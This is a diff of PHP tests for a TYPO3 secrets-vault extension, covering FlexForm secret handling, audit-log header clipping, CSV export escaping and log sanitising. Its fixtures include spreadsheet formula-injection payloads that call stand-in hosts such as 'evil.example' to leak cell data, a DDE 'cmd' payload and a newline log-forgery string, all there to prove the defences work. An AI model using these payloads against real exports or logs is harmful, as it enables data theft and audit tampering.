+            $hook->processDatamap_afterDatabaseOperations('new', 'tt_content', 'NEW1', $fieldArray, $dataHandler);
+
+            $vaultService->clearCache();
+            self::assertSame(
+                $secretValue,
+                $vaultService->retrieve($vaultIdentifier),
+                'The secret must be readable from the vault under its identifier',
+            );
+        } finally {
+            $this->safeDelete($vaultIdentifier);
+        }
+    }
+
+    #[Test]
+    public function hookDiscardsSubmittedSecretWhenDataStructureCannotBeResolved(): void
+    {
+        $this->registerDataStructure('FILE:EXT:nr_vault/Tests/Functional/Hook/Fixtures/no-such-data-structure.xml');
+
+        $hook = $this->get(FlexFormVaultHook::class);
+
+        $secretValue = 'must-never-be-persisted';
+        $fieldArray = $this->buildFieldArray($secretValue);
+
+        $hook->processDatamap_preProcessFieldArray($fieldArray, 'tt_content', 'NEW1');
+
+        self::assertStringNotContainsString(
+            $secretValue,
+            (string) json_encode($fieldArray),
+            'An unresolvable data structure must not let the plaintext through to DataHandler',
+        );
+        self::assertSame(
+            '',
+            $fieldArray['pi_flexform']['data']['sDEF']['lDEF']['apiKey']['vDEF'],
+            'Without a previous secret the field is emptied',
+        );
+    }
+
+    #[Test]
+    public function hookKeepsExistingIdentifierWhenDiscardingSubmittedSecret(): void
+    {
+        $this->registerDataStructure('FILE:EXT:nr_vault/Tests/Functional/Hook/Fixtures/no-such-data-structure.xml');
+
+        $hook = $this->get(FlexFormVaultHook::class);
+
+        $existingIdentifier = $this->generateUuidV7();
+        $secretValue = 'must-never-be-persisted';
+        $fieldArray = $this->buildFieldArray($secretValue, $existingIdentifier);
+
+        $hook->processDatamap_preProcessFieldArray($fieldArray, 'tt_content', 'NEW1');
+
+        self::assertStringNotContainsString(
+            $secretValue,
+            (string) json_encode($fieldArray),
+            'An unresolvable data structure must not let the plaintext through to DataHandler',
+        );
+        self::assertSame(
+            $existingIdentifier,
+            $fieldArray['pi_flexform']['data']['sDEF']['lDEF']['apiKey']['vDEF'],
+            'The already stored secret must stay referenced instead of being orphaned',
+        );
+    }
+
+    /**
+     * Register a data structure for `tt_content.pi_flexform` in the shape the
+     * running core expects: TYPO3 v14 resolves a single data structure string
+     * per field, v13.4 requires the `ds` array with a `default` key.
+     */
+    private function registerDataStructure(string $dataStructure): void
+    {
+        unset($GLOBALS['TCA']['tt_content']['columns']['pi_flexform']['config']['ds_pointerField']);
+
+        $GLOBALS['TCA']['tt_content']['columns']['pi_flexform']['config']['ds']
+            = (new Typo3Version())->getMajorVersion() >= 14
+                ? $dataStructure
+                : ['default' => $dataStructure];
+
+        $this->get(TcaSchemaFactory::class)->rebuild($GLOBALS['TCA']);
+    }
+
+    /**
+     * Build the field array the vault secret element submits for `apiKey`.
+     *
+     * @return array<string, mixed>
+     */
+    private function buildFieldArray(string $secretValue, string $existingIdentifier = ''): array
+    {
+        return [
+            'pi_flexform' => [
+                'data' => [
+                    'sDEF' => [
+                        'lDEF' => [
+                            'apiKey' => [
+                                'vDEF' => [
+                                    'value' => $secretValue,
+                                    '_vault_identifier' => $existingIdentifier,
+                                ],
+                            ],
+                        ],
+                    ],
+                ],
+            ],
+        ];
+    }
+
+    private function createDataHandler(): DataHandler
+    {
+        /** @phpstan-ignore new.internalClass */
+        $dataHandler = GeneralUtility::makeInstance(DataHandler::class);
+        $dataHandler->BE_USER = $GLOBALS['BE_USER'];
+
+        return $dataHandler;
+    }
+
+    /**
+     * Delete a vault secret by identifier, swallowing failures so cleanup never
+     * masks the original assertion.
+     */
+    private function safeDelete(string $identifier): void
+    {
+        try {
+            $vaultService = $this->get(VaultServiceInterface::class);
+            if ($vaultService->exists($identifier)) {
+                $vaultService->delete($identifier, 'test cleanup');
+            }
+        } catch (Throwable) {
+            // best-effort cleanup
+        }
+    }
+}

--- a/Tests/Unit/Audit/AuditLogServiceTest.php
+++ b/Tests/Unit/Audit/AuditLogServiceTest.php
@@ -27,6 +27,7 @@ use PHPUnit\Framework\Attributes\AllowMockObjectsWithoutExpectations;
 use PHPUnit\Framework\Attributes\CoversClass;
 use PHPUnit\Framework\Attributes\Test;
 use PHPUnit\Framework\MockObject\MockObject;
+use Psr\Http\Message\ServerRequestInterface;
 use RuntimeException;
 use TYPO3\CMS\Core\Database\Connection;
 use TYPO3\CMS\Core\Database\ConnectionPool;
@@ -2403,6 +2404,213 @@ final class AuditLogServiceTest extends TestCase
         );
         self::assertArrayHasKey(0, $verification->errors, 'The chain-level epoch-floor error must be recorded');
         self::assertStringContainsString('floor', $verification->errors[0]);
+    }
+
+    // =========================================================================
+    // F8 — `user_agent` / `request_id` come verbatim from client-controlled
+    // request headers and land in fixed-width columns. They must be clipped
+    // on the single array that feeds BOTH the INSERT and the entry hash.
+    // =========================================================================
+
+    #[Test]
+    public function oversizedRequestIdHeaderIsClippedToTheColumnWidth(): void
+    {
+        // `request_id` is varchar(100); an unauthenticated caller can send any
+        // length. Unclipped, strict sql_mode aborts the INSERT (taking the
+        // audited operation with it) and non-strict mode truncates behind the
+        // hash's back.
+        $this->stubServerRequest(requestId: str_repeat('A', 200));
+
+        $captured = $this->captureInsertPayload();
+
+        self::assertIsString($captured['request_id']);
+        self::assertSame(str_repeat('A', 100), $captured['request_id']);
+    }
+
+    #[Test]
+    public function oversizedUserAgentHeaderIsClippedToTheColumnWidth(): void
+    {
+        $this->stubServerRequest(userAgent: str_repeat('B', 900));
+
+        $captured = $this->captureInsertPayload();
+
+        self::assertIsString($captured['user_agent']);
+        self::assertSame(str_repeat('B', 500), $captured['user_agent']);
+    }
+
+    #[Test]
+    public function headersShorterThanTheColumnWidthAreStoredUnchanged(): void
+    {
+        $this->stubServerRequest(requestId: 'req-42', userAgent: self::USER_AGENT);
+
+        $captured = $this->captureInsertPayload();
+
+        self::assertSame('req-42', $captured['request_id']);
+        self::assertSame(self::USER_AGENT, $captured['user_agent']);
+    }
+
+    #[Test]
+    public function multiByteHeadersAreClippedOnACharacterBoundary(): void
+    {
+        // 'ä' is two bytes: a byte-wise cut at the column width would land
+        // mid-character and leave an ill-formed sequence that a utf8mb4
+        // column rejects outright.
+        $this->stubServerRequest(requestId: str_repeat('ä', 200), userAgent: str_repeat('€', 900));
+
+        $captured = $this->captureInsertPayload();
+
+        self::assertIsString($captured['request_id']);
+        self::assertIsString($captured['user_agent']);
+        self::assertSame(str_repeat('ä', 100), $captured['request_id']);
+        self::assertSame(str_repeat('€', 500), $captured['user_agent']);
+        self::assertTrue(mb_check_encoding($captured['request_id'], 'UTF-8'));
+        self::assertTrue(mb_check_encoding($captured['user_agent'], 'UTF-8'));
+    }
+
+    #[Test]
+    public function invalidUtf8InHeadersIsScrubbedBeforeStorage(): void
+    {
+        // Header bytes are arbitrary; an ill-formed sequence is rejected by a
+        // utf8mb4 column, so it must be scrubbed before the value is hashed —
+        // not left for the database to reject or mangle.
+        $this->stubServerRequest(
+            requestId: "req \xC3\x28 broken",
+            userAgent: "ua \xC3\x28 broken",
+        );
+
+        $captured = $this->captureInsertPayload();
+
+        self::assertIsString($captured['request_id']);
+        self::assertIsString($captured['user_agent']);
+        self::assertTrue(mb_check_encoding($captured['request_id'], 'UTF-8'));
+        self::assertTrue(mb_check_encoding($captured['user_agent'], 'UTF-8'));
+        self::assertStringStartsWith('req ', $captured['request_id']);
+        self::assertStringStartsWith('ua ', $captured['user_agent']);
+    }
+
+    /**
+     * The heart of the fix: the entry hash must be computed over exactly the
+     * bytes that were inserted. Epoch 3 binds `user_agent` and `request_id`
+     * into the HMAC, so a clip applied anywhere downstream of the hash (or by
+     * the database itself) would make every later verification of this row
+     * report a tamper that never happened.
+     */
+    #[Test]
+    public function clippedHeaderValuesAreTheExactBytesTheEntryHashCovers(): void
+    {
+        $this->stubServerRequest(
+            requestId: str_repeat('ä', 200),
+            userAgent: str_repeat('€', 900),
+        );
+
+        $epoch3Configuration = $this->createMock(ExtensionConfigurationInterface::class);
+        $epoch3Configuration->method('getAuditHmacEpoch')->willReturn(3);
+
+        $subject = new AuditLogService(
+            $this->connectionPool,
+            $this->accessControlService,
+            $this->masterKeyProvider,
+            $epoch3Configuration,
+        );
+
+        $this->setupDatabaseMocks();
+        $this->connection->method('lastInsertId')->willReturn('42');
+
+        $insertedRow = [];
+        $this->connection
+            ->expects(self::once())
+            ->method('insert')
+            ->with(
+                'tx_nrvault_audit_log',
+                self::callback(static function (array $data) use (&$insertedRow): bool {
+                    $insertedRow = $data;
+
+                    return true;
+                }),
+            );
+
+        $storedHash = null;
+        $this->connection
+            ->expects(self::once())
+            ->method('update')
+            ->with(
+                'tx_nrvault_audit_log',
+                self::callback(static function (array $fields) use (&$storedHash): bool {
+                    $storedHash = $fields['entry_hash'] ?? null;
+
+                    return true;
+                }),
+                self::anything(),
+            );
+
+        $subject->log('s', 'create', true);
+
+        self::assertIsArray($insertedRow);
+        self::assertIsString($storedHash);
+
+        // Recompute the hash from the row as it was INSERTED (clipped values).
+        $expectedHash = AuditLogService::calculateHashV3(
+            AuditLogService::extractV3HashRow(['uid' => 42] + $insertedRow),
+            '',
+            AuditLogService::deriveHmacKey($this->masterKeyProvider),
+        );
+
+        self::assertSame(
+            $expectedHash,
+            $storedHash,
+            'entry_hash must cover the clipped values that were actually stored',
+        );
+    }
+
+    /**
+     * Install a request whose headers the test controls. A mock is used rather
+     * than a real PSR-7 request so that byte sequences a PSR-7 implementation
+     * would reject (invalid UTF-8) can be exercised.
+     */
+    private function stubServerRequest(string $requestId = '', string $userAgent = ''): void
+    {
+        $request = $this->createMock(ServerRequestInterface::class);
+        $request
+            ->method('getHeaderLine')
+            ->willReturnCallback(static fn (string $name): string => match (strtolower($name)) {
+                'x-request-id' => $requestId,
+                'user-agent' => $userAgent,
+                default => '',
+            });
+        $request
+            ->method('getServerParams')
+            ->willReturn(['REMOTE_ADDR' => self::IP_ADDRESS]);
+
+        $GLOBALS['TYPO3_REQUEST'] = $request;
+    }
+
+    /**
+     * Run one `log()` and return the array handed to `Connection::insert()`.
+     *
+     * @return array<string, mixed>
+     */
+    private function captureInsertPayload(): array
+    {
+        $this->setupDatabaseMocks();
+
+        $captured = [];
+        $this->connection
+            ->expects(self::once())
+            ->method('insert')
+            ->with(
+                'tx_nrvault_audit_log',
+                self::callback(static function (array $data) use (&$captured): bool {
+                    $captured = $data;
+
+                    return true;
+                }),
+            );
+
+        $this->getSubject()->log('s', 'create', true);
+
+        self::assertIsArray($captured);
+
+        return $captured;
     }
 
     /**

--- a/Tests/Unit/Command/VaultAuditCommandTest.php
+++ b/Tests/Unit/Command/VaultAuditCommandTest.php
@@ -615,4 +615,89 @@ final class VaultAuditCommandTest extends TestCase
         self::assertStringContainsString('benign_id', $content);
         self::assertStringNotContainsString("'benign_id", $content);
     }
+
+    #[Test]
+    public function csvExportFileDoesNotBreakOutOfQuotedCellOnBackslashQuote(): void
+    {
+        vfsStream::setup('exports');
+
+        // Literal bytes: x\",=WEBSERVICE("http://evil/"&A1),y
+        // With fputcsv's proprietary escape ('\\') the \" sequence is written
+        // through unchanged and closes the quoted cell, so =WEBSERVICE(...)
+        // becomes a cell of its own that the formula sanitizer never saw.
+        $payload = 'x\\",=WEBSERVICE("http://evil/"&A1),y';
+
+        $entry = AuditLogEntry::fromDatabaseRow([
+            'uid' => 1,
+            'crdate' => 1704067200,
+            'secret_identifier' => 'benign_id',
+            'action' => 'read',
+            'success' => 1,
+            'actor_uid' => 1,
+            'actor_username' => 'admin',
+            'actor_type' => 'be_user',
+            'ip_address' => '10.0.0.1',
+            'user_agent' => $payload,
+            'request_id' => '',
+            'entry_hash' => 'hash',
+            'previous_hash' => '',
+            'context' => '{}',
+        ]);
+
+        $this->auditLogService
+            ->method('query')
+            ->willReturn([$entry]);
+
+        $exportFile = vfsStream::url('exports/audit.csv');
+
+        $exitCode = $this->commandTester->execute([
+            '--export' => $exportFile,
+            '--format' => 'csv',
+        ]);
+
+        self::assertSame(0, $exitCode);
+        $content = (string) file_get_contents($exportFile);
+
+        // Emitted bytes: the embedded double quote is RFC-4180 doubled ("")
+        // instead of being left as the backslash-escaped \" of the vulnerable
+        // output, so the cell stays closed.
+        self::assertStringContainsString('"x\\"",=WEBSERVICE(""http://evil/""&A1),y"', $content);
+        self::assertStringNotContainsString('"x\\",=WEBSERVICE(', $content);
+
+        // Strict re-parse (no proprietary escaping): the payload must survive
+        // as exactly one cell and must not produce any formula cell.
+        $rows = $this->parseCsvStrict($content);
+        self::assertCount(2, $rows);
+
+        $columnIndex = array_search('userAgent', $rows[0], true);
+        self::assertIsInt($columnIndex);
+        self::assertSame($payload, $rows[1][$columnIndex]);
+        self::assertSameSize($rows[0], $rows[1]);
+
+        foreach ($rows[1] as $cell) {
+            self::assertStringStartsNotWith('=', (string) $cell);
+        }
+    }
+
+    /**
+     * Parse CSV without PHP's proprietary backslash escaping (RFC 4180 only).
+     *
+     * @return array<int, array<int, string|null>>
+     */
+    private function parseCsvStrict(string $csv): array
+    {
+        $handle = fopen('php://memory', 'r+');
+        self::assertIsResource($handle);
+        fwrite($handle, $csv);
+        rewind($handle);
+
+        $rows = [];
+        while (($row = fgetcsv($handle, escape: '')) !== false) {
+            $rows[] = $row;
+        }
+
+        fclose($handle);
+
+        return $rows;
+    }
 }

--- a/Tests/Unit/Command/VaultAuditCommandTest.php
+++ b/Tests/Unit/Command/VaultAuditCommandTest.php
@@ -27,6 +27,9 @@ use Symfony\Component\Console\Tester\CommandTester;
 #[AllowMockObjectsWithoutExpectations]
 final class VaultAuditCommandTest extends TestCase
 {
+    /** vfs path the CSV export tests write to. */
+    private const EXPORT_PATH = 'exports/audit.csv';
+
     private const IP_ADDRESS = '127.0.0.1';
 
     private AuditLogServiceInterface&MockObject $auditLogService;
@@ -528,7 +531,7 @@ final class VaultAuditCommandTest extends TestCase
             ->method('query')
             ->willReturn([$entry]);
 
-        $exportFile = vfsStream::url('exports/audit.csv');
+        $exportFile = vfsStream::url(self::EXPORT_PATH);
 
         $exitCode = $this->commandTester->execute([
             '--export' => $exportFile,
@@ -601,7 +604,7 @@ final class VaultAuditCommandTest extends TestCase
             ->method('query')
             ->willReturn([$entry]);
 
-        $exportFile = vfsStream::url('exports/audit.csv');
+        $exportFile = vfsStream::url(self::EXPORT_PATH);
 
         $exitCode = $this->commandTester->execute([
             '--export' => $exportFile,
@@ -648,7 +651,7 @@ final class VaultAuditCommandTest extends TestCase
             ->method('query')
             ->willReturn([$entry]);
 
-        $exportFile = vfsStream::url('exports/audit.csv');
+        $exportFile = vfsStream::url(self::EXPORT_PATH);
 
         $exitCode = $this->commandTester->execute([
             '--export' => $exportFile,

--- a/Tests/Unit/Controller/AuditControllerTest.php
+++ b/Tests/Unit/Controller/AuditControllerTest.php
@@ -1,0 +1,147 @@
+<?php
+
+/*
+ * Copyright (c) 2025-2026 Netresearch DTT GmbH
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
+
+declare(strict_types=1);
+
+namespace Netresearch\NrVault\Tests\Unit\Controller;
+
+use Netresearch\NrVault\Audit\AuditLogEntry;
+use Netresearch\NrVault\Controller\AuditController;
+use Netresearch\NrVault\Tests\Unit\TestCase;
+use PHPUnit\Framework\Attributes\Test;
+use Psr\Http\Message\ResponseInterface;
+use ReflectionClass;
+
+/**
+ * Unit tests for the CSV audit export writer of AuditController.
+ *
+ * The module render is covered by the functional/E2E suites (the class is
+ * excluded from the unit coverage source set, hence no CoversClass attribute);
+ * these tests assert the emitted CSV bytes of the private export seam, which
+ * consults no constructor dependency. They pin the strict RFC-4180 output
+ * (`escape: ''`): with PHP's legacy escape character an attacker-controlled
+ * audit field could terminate its own quoted cell and inject a spreadsheet
+ * formula into a cell that CsvFormulaSanitizer never inspected (CWE-1236).
+ */
+final class AuditControllerTest extends TestCase
+{
+    /**
+     * Backslash followed by a double quote — the byte sequence PHP's legacy
+     * escape character keeps unescaped, closing the quoted cell for every
+     * RFC-4180 consumer.
+     */
+    private const BREAKOUT_PAYLOAD = 'x\\",=HYPERLINK("http://evil.example/"&A1,"open")';
+
+    #[Test]
+    public function csvExportDoublesEnclosuresAfterABackslash(): void
+    {
+        $csv = $this->exportCsv([$this->createEntry(requestId: self::BREAKOUT_PAYLOAD)]);
+
+        // The quote following the backslash is doubled, so it stays cell data.
+        self::assertStringContainsString('"x\\"",=HYPERLINK(', $csv);
+        // Sanity check on the inverse: the unescaped, cell-terminating form
+        // that the legacy escape character produced must not appear.
+        self::assertStringNotContainsString('"x\\",=HYPERLINK(', $csv);
+    }
+
+    #[Test]
+    public function csvExportKeepsBreakoutPayloadInsideASingleCell(): void
+    {
+        $csv = $this->exportCsv([$this->createEntry(requestId: self::BREAKOUT_PAYLOAD)]);
+
+        [$header, $row] = $this->parseCsv($csv);
+
+        self::assertCount(\count($header), $row);
+
+        $columnIndex = array_search('requestId', $header, true);
+        self::assertIsInt($columnIndex);
+        self::assertSame(self::BREAKOUT_PAYLOAD, $row[$columnIndex]);
+
+        foreach ($row as $cell) {
+            self::assertThat(
+                $cell === '' || !\in_array($cell[0], ['=', '+', '-', '@', "\t", "\r"], true),
+                self::isTrue(),
+                'No exported cell may start with a spreadsheet formula leader, got: ' . $cell,
+            );
+        }
+    }
+
+    #[Test]
+    public function csvExportStillNeutralizesFormulaLeaders(): void
+    {
+        $csv = $this->exportCsv([$this->createEntry(userAgent: '=cmd|\' /C calc\'!A0')]);
+
+        [$header, $row] = $this->parseCsv($csv);
+
+        $columnIndex = array_search('userAgent', $header, true);
+        self::assertIsInt($columnIndex);
+        self::assertSame('\'=cmd|\' /C calc\'!A0', $row[$columnIndex]);
+    }
+
+    /**
+     * @param list<AuditLogEntry> $entries
+     */
+    private function exportCsv(array $entries): string
+    {
+        $reflection = new ReflectionClass(AuditController::class);
+        $subject = $reflection->newInstanceWithoutConstructor();
+
+        $response = $reflection->getMethod('exportAsCsv')->invoke($subject, $entries);
+        self::assertInstanceOf(ResponseInterface::class, $response);
+
+        return (string) $response->getBody();
+    }
+
+    /**
+     * Parse the export the way an RFC-4180 consumer (Excel, LibreOffice,
+     * Google Sheets) does: quotes are only escaped by doubling.
+     *
+     * @return array{list<string>, list<string>}
+     */
+    private function parseCsv(string $csv): array
+    {
+        $handle = fopen('php://temp', 'r+');
+        self::assertIsResource($handle);
+        fwrite($handle, $csv);
+        rewind($handle);
+
+        $rows = [];
+        while (($row = fgetcsv($handle, escape: '')) !== false) {
+            $rows[] = array_map(static fn (mixed $cell): string => \is_string($cell) ? $cell : '', $row);
+        }
+        fclose($handle);
+
+        self::assertCount(2, $rows, 'Expected exactly a header row and one data row.');
+
+        return [$rows[0], $rows[1]];
+    }
+
+    private function createEntry(string $requestId = 'req-1', string $userAgent = 'curl/8.0'): AuditLogEntry
+    {
+        return new AuditLogEntry(
+            uid: 1,
+            secretIdentifier: 'app/api-key',
+            action: 'read',
+            success: true,
+            errorMessage: null,
+            reason: null,
+            actorUid: 1,
+            actorType: 'backend',
+            actorUsername: 'admin',
+            actorRole: 'admin',
+            ipAddress: '203.0.113.7',
+            userAgent: $userAgent,
+            requestId: $requestId,
+            previousHash: str_repeat('a', 64),
+            entryHash: str_repeat('b', 64),
+            hashBefore: '',
+            hashAfter: '',
+            crdate: 1750000000,
+            context: ['source' => 'unit-test'],
+        );
+    }
+}

--- a/Tests/Unit/EventListener/TypoScriptVaultListenerTest.php
+++ b/Tests/Unit/EventListener/TypoScriptVaultListenerTest.php
@@ -10,6 +10,7 @@ declare(strict_types=1);
 namespace Netresearch\NrVault\Tests\Unit\EventListener;
 
 use Netresearch\NrVault\EventListener\TypoScriptVaultListener;
+use Netresearch\NrVault\Exception\AccessDeniedException;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Tests\Unit\TestCase;
 use PHPUnit\Framework\Attributes\AllowMockObjectsWithoutExpectations;
@@ -45,7 +46,7 @@ final class TypoScriptVaultListenerTest extends TestCase
     {
         $event = $this->createEvent(null);
 
-        $this->vaultService->expects($this->never())->method('retrieve');
+        $this->vaultService->expects($this->never())->method('retrieveForFrontend');
 
         ($this->listener)($event);
 
@@ -58,7 +59,7 @@ final class TypoScriptVaultListenerTest extends TestCase
         $content = 'Regular content without vault references';
         $event = $this->createEvent($content);
 
-        $this->vaultService->expects($this->never())->method('retrieve');
+        $this->vaultService->expects($this->never())->method('retrieveForFrontend');
 
         ($this->listener)($event);
 
@@ -70,9 +71,13 @@ final class TypoScriptVaultListenerTest extends TestCase
     {
         $event = $this->createEvent('%vault(api_key)%');
 
+        // retrieve() decides against the ambient actor, so a request carrying a
+        // backend session would resolve secrets withheld from the frontend.
+        $this->vaultService->expects($this->never())->method('retrieve');
+
         $this->vaultService
             ->expects($this->once())
-            ->method('retrieve')
+            ->method('retrieveForFrontend')
             ->with('api_key')
             ->willReturn('secret_value');
 
@@ -82,12 +87,26 @@ final class TypoScriptVaultListenerTest extends TestCase
     }
 
     #[Test]
+    public function preservesPlaceholderWhenSecretIsNotFrontendAccessible(): void
+    {
+        $event = $this->createEvent('%vault(smtp_password)%');
+
+        $this->vaultService
+            ->method('retrieveForFrontend')
+            ->willThrowException(AccessDeniedException::forIdentifier('smtp_password', 'not frontend accessible'));
+
+        ($this->listener)($event);
+
+        $this->assertSame('%vault(smtp_password)%', $event->getContent());
+    }
+
+    #[Test]
     public function resolvesMultipleVaultReferences(): void
     {
         $event = $this->createEvent('Key: %vault(key1)%, Token: %vault(key2)%');
 
         $this->vaultService
-            ->method('retrieve')
+            ->method('retrieveForFrontend')
             ->willReturnMap([
                 ['key1', 'value1'],
                 ['key2', 'value2'],
@@ -104,7 +123,7 @@ final class TypoScriptVaultListenerTest extends TestCase
         $event = $this->createEvent('%vault(missing_key)%');
 
         $this->vaultService
-            ->method('retrieve')
+            ->method('retrieveForFrontend')
             ->willThrowException(new RuntimeException('Secret not found'));
 
         $this->logger
@@ -128,7 +147,7 @@ final class TypoScriptVaultListenerTest extends TestCase
         $event = $this->createEvent('Bearer %vault(auth_token)%');
 
         $this->vaultService
-            ->method('retrieve')
+            ->method('retrieveForFrontend')
             ->with('auth_token')
             ->willReturn('eyJhbGciOiJIUzI1NiJ9');
 
@@ -143,7 +162,7 @@ final class TypoScriptVaultListenerTest extends TestCase
         $event = $this->createEvent('%vault(my-api_key.v2)%');
 
         $this->vaultService
-            ->method('retrieve')
+            ->method('retrieveForFrontend')
             ->with('my-api_key.v2')
             ->willReturn('special_secret');
 
@@ -158,7 +177,7 @@ final class TypoScriptVaultListenerTest extends TestCase
         // The event content is always string|null, but we test the type check
         $event = $this->createEvent('');
 
-        $this->vaultService->expects($this->never())->method('retrieve');
+        $this->vaultService->expects($this->never())->method('retrieveForFrontend');
 
         ($this->listener)($event);
 
@@ -171,7 +190,7 @@ final class TypoScriptVaultListenerTest extends TestCase
         $event = $this->createEvent('%vault(good_key)% and %vault(bad_key)%');
 
         $this->vaultService
-            ->method('retrieve')
+            ->method('retrieveForFrontend')
             ->willReturnCallback(static function (string $identifier): string {
                 if ($identifier === 'good_key') {
                     return 'resolved';

--- a/Tests/Unit/Hook/DataHandlerHookTest.php
+++ b/Tests/Unit/Hook/DataHandlerHookTest.php
@@ -10,10 +10,12 @@ declare(strict_types=1);
 namespace Netresearch\NrVault\Tests\Unit\Hook;
 
 use Doctrine\DBAL\Result;
+use Netresearch\NrVault\Exception\SecretNotFoundException;
 use Netresearch\NrVault\Exception\VaultException;
 use Netresearch\NrVault\Hook\DataHandlerHook;
 use Netresearch\NrVault\Hook\PendingSecretExtractor;
 use Netresearch\NrVault\Hook\PendingSecretPersister;
+use Netresearch\NrVault\Hook\VaultFailureReporter;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Tests\Unit\TestCase;
 use Netresearch\NrVault\Utility\IdentifierValidator;
@@ -25,6 +27,7 @@ use PHPUnit\Framework\MockObject\MockObject;
 use Psr\Log\LoggerInterface;
 use ReflectionClass;
 use RuntimeException;
+use Stringable;
 use TYPO3\CMS\Core\Database\Connection;
 use TYPO3\CMS\Core\Database\ConnectionPool;
 use TYPO3\CMS\Core\DataHandling\DataHandler;
@@ -58,6 +61,8 @@ final class DataHandlerHookTest extends TestCase
 
     private FlashMessageService&MockObject $flashMessageService;
 
+    private LoggerInterface&MockObject $failureLogger;
+
     protected function setUp(): void
     {
         parent::setUp();
@@ -82,12 +87,15 @@ final class DataHandlerHookTest extends TestCase
             $this->flashMessageService,
         );
 
+        $this->failureLogger = $this->createMock(LoggerInterface::class);
+
         $this->subject = new DataHandlerHook(
             $this->connectionPool,
             $this->vaultService,
             $vaultFieldResolver,
             $pendingSecretExtractor,
             $pendingSecretPersister,
+            new VaultFailureReporter($this->failureLogger),
         );
     }
 
@@ -421,6 +429,92 @@ final class DataHandlerHookTest extends TestCase
             $fieldArray,
             $this->dataHandler,
         );
+    }
+
+    /**
+     * A submitted `_vault_identifier` reaches
+     * `SecretNotFoundException::forIdentifier()` verbatim on the rotate path —
+     * `PendingSecretExtractor` runs no `IdentifierValidator` there. Neither the
+     * PSR-3 message nor any context value may therefore carry the newlines that
+     * would let an editor append fully-formed records to the vault log,
+     * including one quoting the reference the editor was told to report.
+     */
+    #[Test]
+    public function craftedIdentifierCannotForgeALineInTheEmittedLogRecord(): void
+    {
+        $this->mockTcaSchemaForTable('tx_test', [
+            'api_key' => ['type' => 'input', 'renderType' => 'vaultSecret'],
+        ]);
+
+        $connection = $this->createMock(Connection::class);
+        $this->connectionPool->method('getConnectionForTable')->willReturn($connection);
+
+        $flashMessageQueue = $this->createMock(FlashMessageQueue::class);
+        $this->flashMessageService->method('getMessageQueueByIdentifier')->willReturn($flashMessageQueue);
+
+        $crafted = self::EXISTING_UUID
+            . "\nMon, 01 Jan 2035 00:00:00 +0000 [ALERT] request=\"0\" component=\"forged\": owned\r\n\x07";
+
+        $fieldArray = [
+            'api_key' => [
+                'value' => 'updated-secret',
+                '_vault_identifier' => $crafted,
+                '_vault_checksum' => 'existing-checksum',
+            ],
+        ];
+
+        $this->subject->processDatamap_preProcessFieldArray(
+            $fieldArray,
+            'tx_test',
+            42,
+        );
+
+        $this->vaultService
+            ->method('rotate')
+            ->willThrowException(SecretNotFoundException::forIdentifier($crafted));
+
+        /** @var list<array{string, array<string, mixed>}> $records */
+        $records = [];
+        $this->failureLogger
+            ->method('error')
+            ->willReturnCallback(
+                static function (string|Stringable $message, array $context = []) use (&$records): void {
+                    $records[] = [(string) $message, $context];
+                },
+            );
+
+        $this->subject->processDatamap_afterDatabaseOperations(
+            'update',
+            'tx_test',
+            42,
+            $fieldArray,
+            $this->dataHandler,
+        );
+
+        self::assertCount(1, $records);
+
+        [$message, $context] = $records[0];
+
+        // Render the record the way TYPO3's FileWriter does before fwrite($message . LF).
+        $encodedContext = json_encode($context, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
+        self::assertIsString($encodedContext, 'The context must survive json_encode()');
+
+        $renderedRecord = \sprintf(
+            '%s [%s] request="%s" component="%s": %s - %s',
+            'Mon, 01 Jan 2035 00:00:00 +0000',
+            'ERROR',
+            'requestid',
+            'Netresearch.NrVault',
+            $message,
+            $encodedContext,
+        );
+
+        self::assertSame(
+            0,
+            substr_count($renderedRecord, "\n") + substr_count($renderedRecord, "\r"),
+            'A crafted identifier must not be able to append a line to the log',
+        );
+        self::assertSame('Vault operation failed', $message);
     }
 
     #[Test]

--- a/Tests/Unit/Hook/DataHandlerHookTest.php
+++ b/Tests/Unit/Hook/DataHandlerHookTest.php
@@ -16,6 +16,7 @@ use Netresearch\NrVault\Hook\DataHandlerHook;
 use Netresearch\NrVault\Hook\PendingSecretExtractor;
 use Netresearch\NrVault\Hook\PendingSecretPersister;
 use Netresearch\NrVault\Hook\VaultFailureReporter;
+use Netresearch\NrVault\Service\VaultFieldPermissionService;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Tests\Unit\TestCase;
 use Netresearch\NrVault\Utility\IdentifierValidator;
@@ -96,6 +97,7 @@ final class DataHandlerHookTest extends TestCase
             $pendingSecretExtractor,
             $pendingSecretPersister,
             new VaultFailureReporter($this->failureLogger),
+            new VaultFieldPermissionService(),
         );
     }
 

--- a/Tests/Unit/Hook/FlexFormVaultHookTest.php
+++ b/Tests/Unit/Hook/FlexFormVaultHookTest.php
@@ -13,6 +13,7 @@ use Doctrine\DBAL\Result;
 use InvalidArgumentException;
 use Netresearch\NrVault\Exception\VaultException;
 use Netresearch\NrVault\Hook\FlexFormVaultHook;
+use Netresearch\NrVault\Hook\VaultFailureReporter;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Tests\Unit\TestCase;
 use PHPUnit\Framework\Attributes\AllowMockObjectsWithoutExpectations;
@@ -20,6 +21,7 @@ use PHPUnit\Framework\Attributes\CoversClass;
 use PHPUnit\Framework\Attributes\DataProvider;
 use PHPUnit\Framework\Attributes\Test;
 use PHPUnit\Framework\MockObject\MockObject;
+use Psr\Log\LoggerInterface;
 use TYPO3\CMS\Core\Configuration\FlexForm\FlexFormTools;
 use TYPO3\CMS\Core\Database\Connection;
 use TYPO3\CMS\Core\Database\ConnectionPool;
@@ -41,6 +43,12 @@ final class FlexFormVaultHookTest extends TestCase
     private const EXISTING_UUID = '01234567-89ab-7cde-8f01-23456789abcd';
 
     private const RECORD_DELETED = 'Record deleted';
+
+    /**
+     * The correlation reference {@see VaultFailureReporter} puts into the
+     * user-facing message: 8 random bytes, hex-encoded.
+     */
+    private const REFERENCE_PATTERN = '/\b[0-9a-f]{16}\b/';
 
     private ConnectionPool&MockObject $connectionPool;
 
@@ -71,6 +79,7 @@ final class FlexFormVaultHookTest extends TestCase
             $this->vaultService,
             $this->flexFormTools,
             $flashMessageService,
+            new VaultFailureReporter(self::createStub(LoggerInterface::class)),
         );
     }
 
